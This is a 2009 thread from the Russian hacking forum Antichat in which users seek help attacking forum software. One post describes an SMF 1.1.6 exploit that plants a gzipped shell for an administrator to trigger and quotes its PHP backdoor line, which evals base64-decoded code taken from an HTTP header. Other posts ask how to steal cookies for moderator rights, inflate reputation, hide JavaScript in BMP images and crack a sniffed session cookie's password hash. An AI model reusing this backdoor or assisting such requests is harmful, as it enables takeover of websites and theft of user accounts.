ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #241  
Старый 13.08.2009, 02:53
Аватар для leadtek
leadtek
Новичок
Регистрация: 12.08.2009
Сообщений: 2
Провел на форуме:
6657

Репутация: 0
По умолчанию

http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет [img]ссылка на файл[/img].
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?
 
Ответить с цитированием

  #242  
Старый 13.08.2009, 10:37
Аватар для DimOnOID
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от leadtek  
http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет [img]ссылка на файл[/img].
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?
А не проще это сделать всё руками? если алгоритм понятен?
 
Ответить с цитированием

  #243  
Старый 13.08.2009, 21:28
Аватар для leadtek
leadtek
Новичок
Регистрация: 12.08.2009
Сообщений: 2
Провел на форуме:
6657

Репутация: 0
По умолчанию

Если бы все было бы ПОЛНОСТЬЮ понятно, то да %) Я не совсем, например, понял, что за шелл в архиве лежит...
Код:
if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); }
Это случаем не он?
 
Ответить с цитированием

  #244  
Старый 14.08.2009, 00:34
Аватар для probka
probka
Banned
Регистрация: 13.06.2009
Сообщений: 12
Провел на форуме:
138348

Репутация: 10
По умолчанию

Парни подскажити как изменить дату регестрации на форуме?
мне на локалке нужно сделать это
Если кто реально поможет вознагразу 3 баксами.
 
Ответить с цитированием

  #245  
Старый 16.08.2009, 13:01
Аватар для Magister Yoda
Magister Yoda
Новичок
Регистрация: 14.08.2009
Сообщений: 16
Провел на форуме:
33794

Репутация: 0
Отправить сообщение для Magister Yoda с помощью ICQ
По умолчанию

нужен vBulletin версии 3.0.x
выложите кто-нибудь
в инете искал так и не нашёл, либо битая ссылка, либо нету сидеров
----------------------------------------------------------------------
уже найдено

Последний раз редактировалось Magister Yoda; 18.08.2009 в 11:20..
 
Ответить с цитированием

  #246  
Старый 16.08.2009, 15:04
Аватар для jokertnt
jokertnt
Новичок
Регистрация: 18.01.2007
Сообщений: 15
Провел на форуме:
23789

Репутация: 8
По умолчанию

Кто подгонет материал (темы) на получения прав главного модера на юкозе? (как куки стырить и т.д)
 
Ответить с цитированием

  #247  
Старый 17.08.2009, 14:56
Аватар для CR~
CR~
Новичок
Регистрация: 16.04.2009
Сообщений: 1
Провел на форуме:
11189

Репутация: 0
По умолчанию

Меня интересует, можно-ли как-нибудь поднять себе репутацию на форуме версии vBulletin® Version 3.8.3 ?
 
Ответить с цитированием

  #248  
Старый 05.09.2009, 15:08
Аватар для HakaR
HakaR
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
Провел на форуме:
4435957

Репутация: 539
По умолчанию

Подскажите пожалуйста как узнать пути до панели администратора в vBulletin?
 
Ответить с цитированием

  #249  
Старый 07.09.2009, 17:50
Аватар для mmaks
mmaks
Новичок
Регистрация: 27.04.2009
Сообщений: 2
Провел на форуме:
12085

Репутация: 0
По умолчанию

подскажите вот слышал о внедрении javascript в BMP рисунок, какой программой это можно сделать или какому правилу следовать пользуясь hex редактором ?
 
Ответить с цитированием

Snif
  #250  
Старый 08.09.2009, 11:03
Аватар для warlock000
warlock000
Новичок
Регистрация: 06.09.2009
Сообщений: 1
Провел на форуме:
21712

Репутация: 0
По умолчанию Snif

Вобщем проблемка такая, соснифил следущее:

Код:
session_id=a534e4ee349465d8932b52571006737d; modtids=,; forum_read=a:1:{i:7;i:1252358976;}; topicsread=a:1:{i:2;i:1252358990;}; member_id=5; pa ss_hash=c3e5d90d2478f52d9f0aff89e10f1c25; coppa=0; anonlogin=-1
Помогите разобратся нубу xD особенно интересует как разшифровать pa ss_hash (пробовал различные сервисы, онлайн по расшифровке хэшей и программы)

З.Ы. Интересует сам алгоритм собственно и как можно его разшифровать.

P.P.S. PasswordPro не помогает

Последний раз редактировалось warlock000; 08.09.2009 в 12:02..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ *NIX ] Задай вопрос - получи ответ. Xszz *nix 1547 15.06.2010 15:41
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ